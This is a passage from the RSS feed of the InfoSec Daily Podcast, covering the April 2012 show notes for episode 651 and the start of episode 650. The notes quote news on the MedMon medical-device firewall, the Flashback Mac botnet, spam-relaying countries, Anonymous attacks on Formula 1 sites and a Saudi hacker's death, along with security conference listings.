<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The firewall, dubbed MedMon, is only a prototype, but initial tests have demonstrated that it&rsquo;s highly effective when it comes to protecting insulin pumps, pacemakers and even the brain implants on which so many people currently rely.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The research team is composed of Anand Raghunathan, professor of electrical and computer engineering at Perdue, Niraj K. Jha, a Princeton professor of electrical engineering, and two graduate students in electrical engineering from the same university, Chunxiao Li and Meng Zhang.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;You could imagine all sorts of scary possibilities. What motivated us to work on this problem was the ease with which we were able to break into wireless medical systems,&rdquo; Raghunathan said.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the advantages of the new security system is that it can function with existing devices. </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This could be worn as a necklace, or it could be integrated into yourcell phone, for example,&rdquo; he explained.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The experts have developed MedMon because, even though the risks of a breach are low, when it comes to medical devices, every small incident could have a fatal outcome.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The firewall relies on &ldquo;multi-layered anomaly detection&rdquo; to look for signs of potentially malicious activity and when a hazardous situation is detected, MedMon can block the ill-intended packets and notify the user.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While the system isn&rsquo;t completely bulletproof, it&rsquo;s a great step forward and its creators are confident that in certain situations it could be highly effective. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.computerworld.com/s/article/9226429/Flashback_botnet_not_shrinking_huge_numbers_of_Macs_still_infected"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9226429/Flashback_botnet_not_shrinking_huge_numbers_of_Macs_still_infected</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.drweb.com/show/?c=5&amp;i=2386&amp;lng=en"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.drweb.com/show/?c=5&amp;i=2386&amp;lng=en</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Doctor Web&#39;s virus analysts continue to monitor the largest to date Mac botnet discovered by Doctor Web on April 4, 2012. The botnet statistics acquired by Doctor Web contradicts recently published reports indicating a decrease in the number of Macs infected by BackDoor.Flashback.39 The number is still around 650,000.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Doctor Web, 817 879 bots connected to the BackDoor.Flashback.39 botnet at one time or another and average 550 000 infected machines interact with a control server on a 24 hour basis. On April 16, 717004 unique IP-addresses and 595816 Mac UUIDs were registered on the BackDoor.Flashback.39 botnet while on April 17 the figures were 714 483 unique IPs and 582405 UUIDs. At the same time infected computers, that have not been registered on the BackDoor.Flashback.39 network before, join the botnet every day. The chart below shows how the number of bots on the BackDoor.Flashback.39 botnet has been changing from April 3 to April 19, 2012.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://nakedsecurity.sophos.com/2012/04/23/india-becomes-the-king-of-the-spammers-stealing-americas-crown/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/04/23/india-becomes-the-king-of-the-spammers-stealing-americas-crown/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The experts at SophosLabs have released their latest &quot;dirty dozen&quot; report detailing the world&#39;s top spam-relaying countries &#8211; and we&#39;ve discovered that in the space of a year, India has overtaken the United States to become the top global contributor to the junk email problem.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you have a spam in your inbox, there&#39;s an almost one in ten chance that it was relayed from an Indian computer.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The top twelve spam relaying countries for January &#8211; March 2012</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. India&nbsp;&nbsp;&nbsp; 9.3%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. USA&nbsp;&nbsp;&nbsp; 8.3%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. S Korea&nbsp;&nbsp;&nbsp; 5.7%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4= Indonesia&nbsp;&nbsp;&nbsp; 5.0%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4= Russia&nbsp;&nbsp;&nbsp; 5.0%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6. Italy&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; 4.9%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">7. Brazil&nbsp;&nbsp;&nbsp; 4.3%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">8. Poland&nbsp;&nbsp;&nbsp; 3.9%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">9. Pakistan&nbsp;&nbsp;&nbsp; 3.3%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">10. Vietnam&nbsp;&nbsp;&nbsp; 3.2%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">11. Taiwan&nbsp;&nbsp;&nbsp; 2.9%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">12. Peru&nbsp;&nbsp;&nbsp; 2.5%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other&nbsp;&nbsp;&nbsp; 41.7%</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The vast majority of spam comes from home computers that have been compromised by hackers, and commandeered into a botnet. Remote hackers can send spam from recruited computers, as well as potentially steal information or install other malicious code.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.zdnet.com/blog/security/anonymous-hacks-formula-1/11661"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/security/anonymous-hacks-formula-1/11661</span></a><img height="239px;" src="https://lh3.googleusercontent.com/Pd7HUmVTSPqS9Y7fARPIUBUk4w6YwhKrbWogZq359q218_klBykW8umi3KO9mA6YLeZEEL40CLkmErLngJfDUuazLePp5omCa5HLZof6zAiDgNh_q5A" width="619px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacktivist group Anonymous yesterday performed a Distributed Denial of Service (DDoS) attack against Formula 1&rsquo;s main website (</span><a href="http://www.formula1.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">formula1.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">), which is operational again today. The group also hacked and defaced a Formula 1 fan site (</span><a href="http://www.f1-racers.net/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> f1-racers.net</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">), which is still not operational today. Other websites attacked include </span><a href="http://www.f1officialpartners.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">f1officialpartners.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, </span><a href="http://live-timing.formula1.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">live-timing.formula1.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, and </span><a href="http://www.totalf1.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">totalf1.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack comes less than two weeks after Anonymous hacked three UK government websitesover what it called the country&rsquo;s &ldquo;draconian surveillance proposals&rdquo; and &ldquo;derogation of civil rights.&rdquo; While writing this article, I noticed Anonymous today is also trying to take down </span><a href="http://www.gchq.gov.uk/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">gchq.gov.uk</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. Okay, now back to Formula 1.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This time, Anonymous blamed the controversial hosting of the Formula 1 Grand Prix on Sunday in Bahrain, where protests are still taking place. The group sent out a press release the day before in regards to Operation Bahrain, posted on </span><a href="http://www.peoplesliberationfront.net/anonpaste/index.php?6f8553de6f798535#hINXJZuw5+ANqtMz0lO+n+Dxip0y1pWUj4YMQgob180="><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">AnonPaste</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. In a second </span><a href="http://www.peoplesliberationfront.net/anonpaste/index.php?aa30aaed3ddcf47a#SYhEBMgtK2ndIszquhjhywZ6x9LtIjn9QRZZzAIcg5M="><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">AnonPaste</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> post, the group called for its supporters to telephone bomb and e-mail bomb Formula 1 executives.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As you can see in the screenshot above, the group posted a message as part of the website&rsquo;s defacement. It starts by saying the people of Bahrain have struggled against the oppressive regime of King Hamad bin Al Khalifa for over a year:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For over one year the people of Bahrain have struggled against the oppressive regime of King Hamad bin Al Khalifa. They have been murdered in the streets, run over with vehicles, beaten, tortured, tear gassed, kidnapped by police, had their businesses vandalised by police, and have tear gas thrown in to their homes on a nightly basis.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.israelnationalnews.com/News/News.aspx/155010#.T5VMH7-ASaB"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.israelnationalnews.com/News/News.aspx/155010#.T5VMH7-ASaB</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A top Saudi hacker who targeted Israel and Jews has died at age 28, Saudi media reported Sunday. The man, who was not named, died of an asthma attack brought on by summer sandstorms.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacker, who called himself &ldquo;Cyber Terrorist,&rdquo; was known for hacking well-protected sites including Microsoft. He targeted Jewish and Israeli sites in particular, as well as a site belonging to Danish cartoonists who drew cartoons of Mohammed.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A fellow Saudi hacker calling himself &ldquo;hell cyber&rdquo; told the media that &ldquo;Cyber Terrorist&rdquo; had put &ldquo;defending Islam and the Prophet&rdquo; as his top priority.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;One company had shown interest in working with him for a large sum of money, but he rejected the offer because it came from a Jewish company,&rdquo; he related.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Israeli experts have warned that cyber warfare, already an active part of the Israeli-Arab conflict, will become more important with time. While Arab hackers have so far created financial problems, in the future enemies could crack Israeli military or healthcare systems, they say.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A second Saudi hacker, calling himself OxOmar, gained notoriety in Israel for attacking the El-Al website and stock exchange and publishing the details of thousands of Israelis&rsquo; credit cards.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-651-medmon-flashback-king-of-spammers-f1-and-israeli-hacker/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3822/0/infosec-daily-podcast-episode-651.mp3" length="61975910" type="audio/mpeg" />
		<itunes:duration>0:43:01</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 651 for April 21, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
&#160;
Announcements
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 651 for April 21, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
&#160;
Announcements
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Please consider making your &#160;Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
or simply use our QR Code Links.
Amazon:
Amazon UK:
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://news.softpedia.com/news/Researchers-Make-Firewall-to-Protect-Medical-Devices-Against-Hackers-265970.shtml
There has been a lot of buzz lately around the vulnerabilities that expose wireless medicald evices to cybercriminals, but researchers from Princeton and Purdue universities may have found a solution to these issues. They have created a firewall that&#39;s specially designed for these types of apparatus.
&#160;
The firewall, dubbed MedMon, is only a prototype, but initial tests have demonstrated that it&#8217;s highly effective when it comes to protecting insulin pumps, pacemakers and even the brain implants on which so many people currently rely.
&#160;
The research team is composed of Anand Raghunathan, professor of electrical and computer engineering at Perdue, Niraj K. Jha, a Princeton professor of electrical engineering, and two graduate students in electrical engineering from the same university, Chunxiao Li and Meng Zhang.
&#160;
&#8220;You could imagine all sorts of scary possibilities. What motivated us to work on this problem was the ease with which we were able to break into wireless medical systems,&#8221; Raghunathan said.
&#160;
One of the advantages of the new security system is that it can function with existing devices. 
&#160;
&#8220;This could be worn as a necklace, or it could be integrated into yourcell phone, for example,&#8221; he explained.
&#160;
The experts have developed MedMon because, even though the risks of a breach are low, when it comes to medical devices, every small incident could have a fatal outcome.
&#160;
The firewall relies on &#8220;multi-layered anomaly detection&#8221; to look for signs of potentially malicious activity and when a hazardous situation is detected, MedMon can block the ill-intended packets and notify the user.
&#160;
While the system isn&#8217;t completely bulletproof, it&#8217;s a great step forward and its creators are confident that in certain situations it could be highly effective. 
&#8230;.
Source: &#160;http://www.computerworld.com/s/article/9226429/Flashback_botnet_n[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 650 &#8211; Microsoft Intune, Sleepy Pilot, Is Java Free?, TV Hacking, Big Brother for Cars, and Skype Virus</title>
		<link>http://www.isdpodcast.com/episode-650-microsoft-intune-sleepy-pilot-is-java-free-tv-hacking-big-brother-for-cars-and-skype-virus</link>
		<comments>http://www.isdpodcast.com/episode-650-microsoft-intune-sleepy-pilot-is-java-free-tv-hacking-big-brother-for-cars-and-skype-virus#comments</comments>
		<pubDate>Sat, 21 Apr 2012 01:06:17 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3799</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 650 for April 20, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad and Karthik Rangarajan. &#160; Announcements Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 650 for April 20, 2012. </span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
